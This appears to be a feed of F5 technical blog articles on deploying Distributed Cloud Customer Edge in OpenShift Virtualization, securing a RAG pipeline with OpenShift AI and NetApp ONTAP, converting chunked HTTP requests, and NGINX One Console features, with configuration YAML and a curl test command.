Integrating F5 Distributed Cloud Customer Edge (XC CE) into OpenShift Virtualization further enhances this environment by providing advanced networking and security capabilities. The combination offers several benefits:

Multi-Tenancy: Deploy multiple CE VMs, each dedicated to a specific tenant, enabling isolation and customization for different teams or departments within a secure, multi-tenant environment.
Load Balancing: Efficiently manage and distribute application traffic to optimize performance and resource utilization.
Enhanced Security: Implement advanced threat protection at the edge to strengthen your security posture against emerging threats.
Microservices Management: Seamlessly integrate and manage microservices, enhancing agility and scalability.

This guide provides a step-by-step approach to deploying XC CE within OpenShift Virtualization, detailing the technical considerations and configurations required.

Technical Overview

Deploying XC CE within OpenShift Virtualization involves several key technical steps:

Preparation
- Cluster Setup: Ensure an operational OpenShift cluster with OpenShift Virtualization installed.
- Access Rights: Confirm administrative permissions to configure compute and network settings.
- F5 XC Account: Obtain access to generate node tokens and download the XC CE images.

Resource Optimization
- Enable CPU Manager: Configure the CPU Manager to allocate CPU resources effectively.
- Configure Topology Manager: Set the policy to single-numa-node for optimal NUMA performance.

Network Configuration
- Open vSwitch (OVS) Bridges: Set up OVS bridges on worker nodes to handle networking for the virtual machines.
- NetworkAttachmentDefinitions (NADs): Use Multus CNI to define how virtual machines attach to multiple networks, supporting both external and internal connectivity.

Image Preparation
- Obtain XC CE Image: Download the XC CE image in qcow2 format, suitable for KubeVirt.
- Generate Node Token: Create a one-time node token from the F5 Distributed Cloud Console for node registration.
- User Data Configuration: Prepare cloud-init user data with the node token and network settings to automate the VM initialization process.

Deployment
- Create DataVolumes: Import the XC CE image into the cluster using the Containerized Data Importer (CDI).
- Deploy VirtualMachine Resources: Apply manifests to deploy XC CE instances in OpenShift.
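On OpenShift, the CPU Manager and Topology Manager settings above are typically applied through a KubeletConfig custom resource that targets a machine config pool. A sketch, assuming the worker machine config pool carries the label custom-kubelet: cpumanager-enabled:

apiVersion: machineconfiguration.openshift.io/v1
kind: KubeletConfig
metadata:
  name: cpumanager-enabled
spec:
  machineConfigPoolSelector:
    matchLabels:
      custom-kubelet: cpumanager-enabled   # label assumed on the worker MCP
  kubeletConfig:
    cpuManagerPolicy: static               # enables the CPU Manager
    cpuManagerReconcilePeriod: 5s
    topologyManagerPolicy: single-numa-node

Note that applying a KubeletConfig triggers a rolling reboot of the affected nodes, so plan the change accordingly.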
Network Configuration

Setting up the network involves creating Open vSwitch (OVS) bridges and defining NetworkAttachmentDefinitions (NADs) to enable multiple network interfaces for the virtual machines.

Open vSwitch (OVS) Bridges

Create a NodeNetworkConfigurationPolicy to define OVS bridges on all worker nodes:

apiVersion: nmstate.io/v1
kind: NodeNetworkConfigurationPolicy
metadata:
  name: ovs-vms
spec:
  nodeSelector:
    node-role.kubernetes.io/worker: ''
  desiredState:
    interfaces:
      - name: ovs-vms
        type: ovs-bridge
        state: up
        bridge:
          allow-extra-patch-ports: true
          options:
            stp: true
          port:
            - name: eno1
    ovn:
      bridge-mappings:
        - localnet: ce2-slo
          bridge: ovs-vms
          state: present

Replace eno1 with the appropriate physical network interface on your nodes. This policy sets up an OVS bridge named ovs-vms connected to the physical interface.

NetworkAttachmentDefinitions (NADs)

Define NADs using Multus CNI to attach networks to the virtual machines.

External Network (ce2-slo): Connects VMs to the physical network with a specific VLAN ID. This setup allows the VMs to communicate with external systems, services, or networks, which is essential for applications that require access to resources outside the cluster or need to expose services to external users.

apiVersion: k8s.cni.cncf.io/v1
kind: NetworkAttachmentDefinition
metadata:
  name: ce2-slo
  namespace: f5-ce
spec:
  config: |
    {
      "cniVersion": "0.4.0",
      "name": "ce2-slo",
      "type": "ovn-k8s-cni-overlay",
      "topology": "localnet",
      "netAttachDefName": "f5-ce/ce2-slo",
      "mtu": 1500,
      "vlanID": 3052,
      "ipam": {}
    }

Internal Network (ce2-sli): Provides an isolated Layer 2 network for internal communication. Setting the topology to "layer2" makes this network an internal overlay that is not directly connected to the physical network infrastructure. The MTU is set to 1400 bytes to accommodate the overhead introduced by the encapsulation protocols used in the overlay.

apiVersion: k8s.cni.cncf.io/v1
kind: NetworkAttachmentDefinition
metadata:
  name: ce2-sli
  namespace: f5-ce
spec:
  config: |
    {
      "cniVersion": "0.4.0",
      "name": "ce2-sli",
      "type": "ovn-k8s-cni-overlay",
      "topology": "layer2",
      "netAttachDefName": "f5-ce/ce2-sli",
      "mtu": 1400,
      "ipam": {}
    }

VirtualMachine Configuration

Configuring the virtual machine involves preparing the image, creating cloud-init user data, and defining the VirtualMachine resource.

Image Preparation
- Obtain XC CE Image: Download the qcow2 image from the F5 Distributed Cloud Console.
- Generate Node Token: Acquire a one-time node token for node registration.

Cloud-Init User Data

Create a user-data configuration containing the node token and network settings:

#cloud-config
write_files:
  - path: /etc/vpm/user_data
    content: |
      token: <your-node-token>
      slo_ip: <IP>/<prefix>
      slo_gateway: <Gateway IP>
      slo_dns: <DNS IP>
    owner: root
    permissions: '0644'

Replace the placeholders with your actual network configuration. This file automates the VM's initial setup and registration.

VirtualMachine Resource Definition

Define the VirtualMachine resource, specifying CPU, memory, disks, network interfaces, and cloud-init configuration (see the sketch after this list):
- Resources: Allocate sufficient CPU and memory.
- Disks: Reference the DataVolume containing the XC CE image.
- Interfaces: Attach NADs for network connectivity.
- Cloud-Init: Embed the user data for automatic configuration.
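Putting these pieces together, a trimmed VirtualMachine manifest might look like the following. This is a sketch rather than the exact manifest from the guide: the VM name, CPU and memory sizes, and DataVolume name are assumptions, while the network names match the NADs defined above.

apiVersion: kubevirt.io/v1
kind: VirtualMachine
metadata:
  name: xc-ce-2                        # hypothetical VM name
  namespace: f5-ce
spec:
  running: true
  template:
    spec:
      domain:
        cpu:
          cores: 8                     # size per F5 XC CE requirements
        memory:
          guest: 32Gi
        devices:
          disks:
            - name: rootdisk
              disk:
                bus: virtio
            - name: cloudinitdisk
              disk:
                bus: virtio
          interfaces:
            - name: slo                # external interface -> ce2-slo
              bridge: {}
            - name: sli                # internal interface -> ce2-sli
              bridge: {}
      networks:
        - name: slo
          multus:
            networkName: f5-ce/ce2-slo
        - name: sli
          multus:
            networkName: f5-ce/ce2-sli
      volumes:
        - name: rootdisk
          dataVolume:
            name: xc-ce-image          # DataVolume imported earlier via CDI
        - name: cloudinitdisk
          cloudInitNoCloud:
            userData: |
              #cloud-config
              write_files:
                - path: /etc/vpm/user_data
                  content: |
                    token: <your-node-token>
                    slo_ip: <IP>/<prefix>
                    slo_gateway: <Gateway IP>
                    slo_dns: <DNS IP>
                  owner: root
                  permissions: '0644'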
Conclusion

Deploying F5 Distributed Cloud CE in OpenShift Virtualization enables organizations to leverage advanced networking and security features within their existing Kubernetes infrastructure. This integration facilitates a more secure, efficient, and scalable environment for modern applications. For detailed deployment instructions and configuration examples, please refer to the attached PDF guide.

Related Articles:
BIG-IP VE in Red Hat OpenShift Virtualization
VMware to Red Hat OpenShift Virtualization Migration
OpenShift Virtualization
Secure AI RAG using F5 Distributed Cloud in Red Hat OpenShift AI and NetApp ONTAP Environment

Introduction

Retrieval Augmented Generation (RAG) is a powerful technique that allows Large Language Models (LLMs) to access information beyond their training data. The "R" in RAG refers to retrieval: the system retrieves relevant information from an external knowledge base based on the input query. The "A" stands for augmentation, or context enrichment: the system combines the retrieved information with the input query to create a more comprehensive prompt for the LLM. Finally, the "G" stands for generation: the LLM generates a more contextually accurate response based on the augmented prompt.

RAG is becoming increasingly popular in enterprise AI applications due to its ability to provide more accurate and contextually relevant responses to a wide range of queries. However, deploying RAG can introduce complexity because its components often live in different environments. For instance, the datastore or corpus, a collection of data, is typically kept on-premises for tighter control over data access and management, driven by data security, governance, and regulatory compliance requirements within the enterprise. Meanwhile, inference services are often deployed in the cloud for scalability and cost-effectiveness.

In this article, we discuss how F5 Distributed Cloud can simplify this complexity and securely connect all RAG components for enterprise RAG-enabled AI application deployments. Specifically, we focus on Network Connect, App Connect, and Web App & API Protection, and we demonstrate how these F5 Distributed Cloud capabilities can secure RAG in collaboration with Red Hat OpenShift AI and NetApp ONTAP.

Example Topology

F5 Distributed Cloud Network Connect

F5 Distributed Cloud Network Connect enables seamless and secure network connectivity across hybrid and multicloud environments. By deploying an F5 Distributed Cloud Customer Edge (CE) at each site, we can easily establish encrypted site-to-site connectivity across on-premises, multicloud, and edge environments.

Jensen Huang, CEO of NVIDIA, has said that "Nearly half of the files in the world are stored on-prem on NetApp." In our example, the enterprise data store is deployed on NetApp ONTAP in a data center in Seattle managed by organization B (Segment-B: s-gorman-production-segment), while the RAG services, including the embedding Large Language Model (LLM) and the vector database, are deployed on-premises on a Red Hat OpenShift cluster in a data center in California managed by organization A (Segment-A: jy-ocp). By leveraging F5 Distributed Cloud Network Connect, we can quickly and easily establish a secure connection for seamless and efficient data transfer from the enterprise data store to the RAG services between these two segments only.

F5 Distributed Cloud CE can be deployed as a virtual machine (VM) or as a pod on a Red Hat OpenShift cluster. In California, we deploy the CE as a VM using Red Hat OpenShift Virtualization; click here to find out more on Deploying F5 Distributed Cloud Customer Edge in Red Hat OpenShift Virtualization.

Segment-A: jy-ocp is configured on the CE in California and Segment-B: s-gorman-production-segment on the CE in Seattle, and a Segment Connector simply and securely connects these two segments only. NetApp ONTAP in Seattle has a LUN named "tbd-RAG", which serves as the enterprise data store in our demo setup and contains a collection of data.
After these two data centers are connected using F5 XC Network Connect, a secure, encrypted end-to-end connection is established between them. In our example, "test-ai-tbd" is in the California data center, where it hosts the RAG services, including the embedding Large Language Model (LLM) and the vector database, and it can now successfully connect to the enterprise data store on NetApp ONTAP in the Seattle data center.

F5 Distributed Cloud App Connect

F5 Distributed Cloud App Connect securely connects and delivers distributed applications and services across hybrid and multicloud environments. By using App Connect, we can direct inference traffic through F5 Distributed Cloud's security layers to safeguard our inference endpoints.

Red Hat OpenShift on Amazon Web Services (ROSA) is a fully managed service that allows users to develop, run, and scale applications in a native AWS environment. We can host our inference service on ROSA to take advantage of the scalability, cost-effectiveness, and other benefits of AWS's managed infrastructure services. For instance, we can host the inference service on ROSA by deploying Ollama with multiple AI/ML models, or we can enable Model Serving on Red Hat OpenShift AI (RHOAI).

Red Hat OpenShift AI (RHOAI) is a flexible and scalable AI/ML platform built on the capabilities of Red Hat OpenShift that facilitates collaboration among data scientists, engineers, and app developers. The platform allows them to serve, build, train, deploy, test, and monitor AI/ML models and applications either on-premises or in the cloud, fostering efficient innovation within organizations. In our example, we use Red Hat OpenShift AI (RHOAI) Model Serving on ROSA for our inference service.

Once the inference service is deployed on ROSA, we can use F5 Distributed Cloud to secure the inference endpoint by steering inference traffic through F5 Distributed Cloud's security layers, which offer an extensive suite of features designed specifically for the security of modern AI/ML inference endpoints. This setup allows us to scrutinize requests, enforce policies for detected threats, and protect sensitive data sets before they reach the inference service hosted within ROSA. In our example, we set up an F5 Distributed Cloud HTTP Load Balancer (rhoai-llm-serving.f5-demo.com) and advertise it to the CE in the California data center only. We can now reach our Red Hat OpenShift AI (RHOAI) inference endpoint through F5 Distributed Cloud.

F5 Distributed Cloud Web App & API Protection

F5 Distributed Cloud Web App & API Protection provides a comprehensive set of security features, with uniform observability and policy enforcement, to protect apps and APIs across hybrid and multicloud environments. Having steered the inference traffic through F5 Distributed Cloud with App Connect, we can now protect the Red Hat OpenShift AI (RHOAI) inference endpoint by rate-limiting access, ensuring that no single client can exhaust the inference service. A "Too Many Requests" response is returned when a single client repeatedly requests the inference service at a rate higher than the configured threshold. This is just one of many security features available to protect the inference service. Click here to find out more on Securing Model Serving in Red Hat OpenShift AI (on ROSA) with F5 Distributed Cloud API Security.
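To verify the rate limit from a client's perspective, a short loop of requests against the load balancer is enough; once the threshold is crossed, the returned status codes flip from 200 to 429 (Too Many Requests). The inference path below is a placeholder for your model's actual endpoint:

# Fire a burst of requests and print only the HTTP status codes
for i in $(seq 1 20); do
  curl -s -o /dev/null -w "%{http_code}\n" \
    https://rhoai-llm-serving.f5-demo.com/<inference-path>
done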
Demonstration

In a real-world scenario, the front-end application could be hosted in the cloud, hosted at the edge, or served through F5 Distributed Cloud, offering flexible alternatives for efficient application delivery based on user preferences and specific needs. To illustrate how all the discussed components work seamlessly together, we simplify our example by deploying Open WebUI as the front-end application on the Red Hat OpenShift cluster in the California data center, which also hosts the RAG services. While a DPU or GPU could be used for improved performance, our setup utilizes a CPU for inferencing tasks.

We connect our app to our enterprise data stores deployed on NetApp ONTAP in the Seattle data center using F5 Distributed Cloud Network Connect, where we have a copy of "Chapter 1. About the Migration Toolkit for Virtualization" from Red Hat. These documents are processed and saved to the vector DB:

Our embedding Large Language Model (LLM) is Sentence-Transformers/all-MiniLM-L6-v2, and here is our RAG template (a minimal end-to-end sketch of this retrieve-augment-generate flow appears at the end of this article):

Instead of connecting to the inference endpoint on Red Hat OpenShift AI (RHOAI) on ROSA directly, we connect to the F5 Distributed Cloud HTTP Load Balancer (rhoai-llm-serving.f5-demo.com) configured in F5 Distributed Cloud App Connect:

Previously, we asked, "What is MTV?" and never received a response related to the Red Hat Migration Toolkit for Virtualization:

Now, let's try asking the same question again with the RAG services enabled:

We finally received the response we had anticipated. Next, we use F5 Distributed Cloud Web App & API Protection to safeguard our Red Hat OpenShift AI (RHOAI) inference endpoint on ROSA by rate-limiting access, thus preventing a single client from exhausting the inference service:

As expected, we received a "Too Many Requests" error in our app upon requesting the inference service at a rate greater than the set threshold:

With F5 Distributed Cloud's real-time observability and security analytics in the F5 Distributed Cloud Console, we can proactively monitor for potential threats. For example, if necessary, we can block a client from accessing the inference service by adding it to the Blocked Clients List:

As expected, this specific client is now unable to access the inference service:

Summary

Deploying and securing RAG for enterprise RAG-enabled AI applications in a multi-vendor, hybrid, and multicloud environment can present complex challenges. In collaboration with Red Hat OpenShift AI (RHOAI) and NetApp ONTAP, F5 Distributed Cloud provides an effortless solution that secures RAG components seamlessly for enterprise RAG-enabled AI applications.
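For readers who want to see the moving parts in code, here is the minimal, illustrative sketch of the retrieve-augment-generate loop referenced in the demonstration above, using the same embedding model named in the demo. The in-memory corpus list stands in for the vector database, generate() is a placeholder for the call to the inference endpoint behind the F5 Distributed Cloud HTTP Load Balancer, and the corpus strings and prompt template are hypothetical, not the demo's actual data:

# Minimal sketch of the retrieve-augment-generate loop.
# Requires: pip install sentence-transformers
from sentence_transformers import SentenceTransformer, util

embedder = SentenceTransformer("sentence-transformers/all-MiniLM-L6-v2")

# Stand-in corpus; in the demo, these chunks come from documents on NetApp ONTAP.
corpus = [
    "The Migration Toolkit for Virtualization (MTV) migrates VMs to OpenShift.",
    "F5 Distributed Cloud connects apps across hybrid and multicloud environments.",
]
corpus_embeddings = embedder.encode(corpus, convert_to_tensor=True)

def retrieve(query: str, top_k: int = 1) -> list[str]:
    """R: find the corpus chunks most similar to the query."""
    query_embedding = embedder.encode(query, convert_to_tensor=True)
    hits = util.semantic_search(query_embedding, corpus_embeddings, top_k=top_k)[0]
    return [corpus[hit["corpus_id"]] for hit in hits]

def augment(query: str, context: list[str]) -> str:
    """A: fold the retrieved context into the prompt (a simple RAG template)."""
    return f"Use the following context to answer.\nContext: {' '.join(context)}\nQuestion: {query}"

def generate(prompt: str) -> str:
    """G: placeholder for the call to the inference endpoint behind F5 XC."""
    return f"[LLM response for prompt of {len(prompt)} chars]"

print(generate(augment("What is MTV?", retrieve("What is MTV?"))))

In the actual deployment, retrieve() would query the vector database populated from the NetApp ONTAP data store, and generate() would POST to the load balancer at rhoai-llm-serving.f5-demo.com.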
F5 Distributed Cloud and Transfer Encoding: Chunking

My team recently came across an unusual request from an F5 Distributed Cloud customer: how do we support HTTP/API clients that can only send Transfer-Encoding: chunked requests? What even is chunking?

What is Transfer Encoding? The key word is "encoding": HTTP uses a header to communicate which scheme encodes the data in a message body. Encodings can serve functional purposes as well as communication optimization. Transfer Encoding is most commonly leveraged for chunking, which takes a large piece of data and breaks it into smaller pieces that are sent between two nodes along a path, transparently to the application sending and receiving the messages. These nodes are not necessarily the source and destination of an HTTP conversation, so proxies in between may transparently reassemble the chunks for different parts of the path. A chunked message does not use a Content-Length header. Contrast this with Content Encoding, which is more commonly used for compression of message bodies (although compression can be done with Transfer Encoding too) and requires the length to be defined. Proxies along the path are expected not to change these values, but this is not always the case.

In our customer scenario, the request was exactly for the proxy (in this case, Distributed Cloud) to support chunked requests from the client to an HTTP/2 server (HTTP/2 does away with chunking completely). With Distributed Cloud, we fulfill this with three simple config elements:

1. The HTTP Load Balancer object is configured to be an HTTP/1.1 virtual server:

2. The origin is configured to use HTTP/2 (which defines Distributed Cloud's behavior as an HTTP client):

3. Back in the HTTP Load Balancer dialog, under the Other Settings section, we configure a Buffer Policy under Miscellaneous Options:

A value configured in that dialog (it is the only property aside from an enable checkbox) limits the request size to the specified number of bytes, but it has the added benefit of allowing the Distributed Cloud proxy to buffer the chunked requests, convert them into messages with the length specified, and then send them to the server via an HTTP/2 connection.

To test this connection, a simple cURL command with the header "Transfer-Encoding: chunked" and the -v flag can validate your config, e.g.:

curl -v --location 'https://[URL/PATH]:PORT' --header 'Transfer-Encoding: chunked' --data ''

With the -v (verbose) flag, the output will include the following:

* using HTTP/1.x
> POST [PATH] HTTP/1.1
> Host: [URL]
> User-Agent: curl/8.7.1
…
> Transfer-Encoding: chunked
…

Note the Transfer-Encoding: chunked line, which shows that chunking was used on the client-side connection. You can validate the server-side connection in the request logs in the Distributed Cloud dashboard by looking at the response headers specified in the event JSON:

"rsp_headers": "{\":status\":\"200\",\"connection\":\"close\",\"content-length\":\"26930\", [TRUNCATED]

This shows a Transfer-Encoding: chunked client-side request being converted to a request with an explicit Content-Length on the server side.

Special shoutout to fellow F5er Gowry Bhaagavathula for collaborating with me on getting this figured out!
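If you would rather exercise the chunked path programmatically than with cURL, here is a minimal sketch in Python. The requests library sends Transfer-Encoding: chunked whenever the body is supplied as a generator, because no Content-Length can be computed up front; the URL below is a hypothetical placeholder:

# Minimal sketch: send a chunked request to the Distributed Cloud load balancer
# from Python. requests uses Transfer-Encoding: chunked automatically when the
# body is a generator (it cannot compute a Content-Length in advance).
import requests

def body_chunks():
    """Yield the payload in pieces; each yield becomes one HTTP chunk."""
    for piece in (b"first-chunk|", b"second-chunk|", b"last-chunk"):
        yield piece

# Hypothetical URL; substitute your load balancer's hostname and path.
resp = requests.post("https://example-lb.f5-demo.com/api/upload", data=body_chunks())
print(resp.status_code, resp.headers.get("content-length"))

As with the cURL test, the request logs in the Distributed Cloud dashboard can then confirm that the server-side connection carried an explicit Content-Length.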
How I did it - "Delivering Kasm Workspaces three ways"

Securing modern, containerized platforms like Kasm Workspaces requires a robust and multi-faceted approach to ensure performance, reliability, and data protection. In this edition of "How I did it", we'll see how F5 technologies can enhance the security and scalability of Kasm Workspaces deployments.
Experience the power of F5 NGINX One with feature demos

Introduction

Introducing F5 NGINX One, a comprehensive solution designed to significantly enhance business operations through improved reliability and performance. At the core of NGINX One is our data plane, which is built on our world-class, lightweight, and high-performance NGINX software. This foundation provides robust traffic management solutions that are essential for modern digital businesses. These solutions include API Gateway, Content Caching, Load Balancing, and Policy Enforcement.

NGINX One includes a user-friendly, SaaS-based NGINX One Console that provides essential telemetry and oversees operations without requiring custom development or infrastructure changes. This visibility empowers teams to promptly address customer experience, security vulnerabilities, network performance, and compliance concerns. NGINX One's deployment across various environments empowers businesses to enhance their operations with improved reliability and performance. It is a versatile tool for strengthening operational efficiency, security posture, and the overall digital experience.

NGINX One Console: Simplifying Application Delivery and Management

NGINX One has several promising features on the horizon. Let's highlight three key features: Monitor Certificates and CVEs, Edit and Update Configurations, and Config Sync Groups. Let's delve into these in detail.

Monitor Certificates and CVEs

One of NGINX One's standout features is its ability to monitor Common Vulnerabilities and Exposures (CVEs) and certificate status. This functionality is crucial for maintaining application security integrity in a continually evolving threat landscape. The CVE and certificate monitoring capability of NGINX One enables teams to:

Prioritize Remediation Efforts: With an accurate and up-to-date database of CVEs and a comprehensive certificate monitoring system, NGINX One assists teams in prioritizing vulnerabilities and certificate issues according to their severity, guaranteeing that essential security concerns are addressed without delay.

Maintain Compliance: Continuous monitoring for CVEs and certificates ensures that applications comply with security standards and regulations, which is crucial for industries subject to stringent compliance mandates.

Edit and Update Configurations

This feature empowers users to efficiently edit configurations and perform updates directly within the NGINX One Console interface. With configuration editing, you can:

Make Configuration Changes: Quickly adapt to changing application demands by modifying configurations, ensuring optimal performance and security.

Simplify Management: Eliminate the need to SSH directly into each instance to edit or update configurations.

Reduce Errors: The intuitive interface minimizes potential errors in configuration changes, enhancing reliability by offering helpful recommendations.

Enhance Automation with the NGINX One SaaS Console: Integrates seamlessly into CI/CD and GitOps workflows, including GitHub, through a comprehensive set of APIs.

Config Sync Groups

The Config Sync Groups feature is invaluable for environments running multiple NGINX instances. It ensures consistent configurations across all instances, enhancing application reliability and reducing administrative overhead. The Config Sync Groups capability offers:

Automated Synchronization: Configurations are seamlessly synchronized across NGINX instances, guaranteeing that all applications operate with the most current and secure settings.
When a Config Sync Group already has a defined configuration, it is automatically pushed to instances as they join.

Scalability Support: Organizations can easily incorporate new NGINX instances without compromising configuration integrity as their infrastructure expands.

Minimized Configuration Drift: This feature is crucial for maintaining consistency across environments and preventing potential application errors or vulnerabilities caused by configuration discrepancies.

Conclusion

The NGINX One Console redefines digital monitoring and management by bringing together all of the NGINX core capabilities and use cases. This all-encompassing platform is equipped with sophisticated features to simplify user interaction, drastically cut operational overhead and expenses, bolster security protocols, and broaden operational adaptability. Read our announcement blog for more details on the launch. To explore the platform's capabilities and see it in action, we invite you to tune in to our webinar on September 25th. This is a great opportunity to witness firsthand how NGINX One can revolutionize your digital monitoring and management strategies.
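As a concrete, purely illustrative example of the kind of configuration these features operate on, here is a minimal nginx.conf sketch that an NGINX One-managed instance might carry and keep synchronized across a Config Sync Group. The upstream addresses, server name, and certificate paths are hypothetical placeholders, not values from NGINX One itself:

# Minimal sketch of a load-balancing configuration; all names are hypothetical.
upstream app_backend {
    server 10.0.0.11:8080;
    server 10.0.0.12:8080;
}

server {
    listen 443 ssl;
    server_name app.example.com;

    ssl_certificate     /etc/nginx/certs/app.example.com.crt;  # the kind of cert the Console can monitor for expiry
    ssl_certificate_key /etc/nginx/certs/app.example.com.key;

    location / {
        proxy_pass http://app_backend;            # load balance across the upstream servers
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
    }
}

Editing a file like this once in the Console and letting the Config Sync Group push it to every joining instance is what eliminates per-instance SSH sessions and configuration drift.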
How I Did it - Migrating Applications to Nutanix NC2 with F5 Distributed Cloud Secure Multicloud Networking

In this edition of "How I Did it", we will explore how F5 Distributed Cloud Services (XC) enables seamless application extension and migration from an on-premises environment to Nutanix NC2 clusters.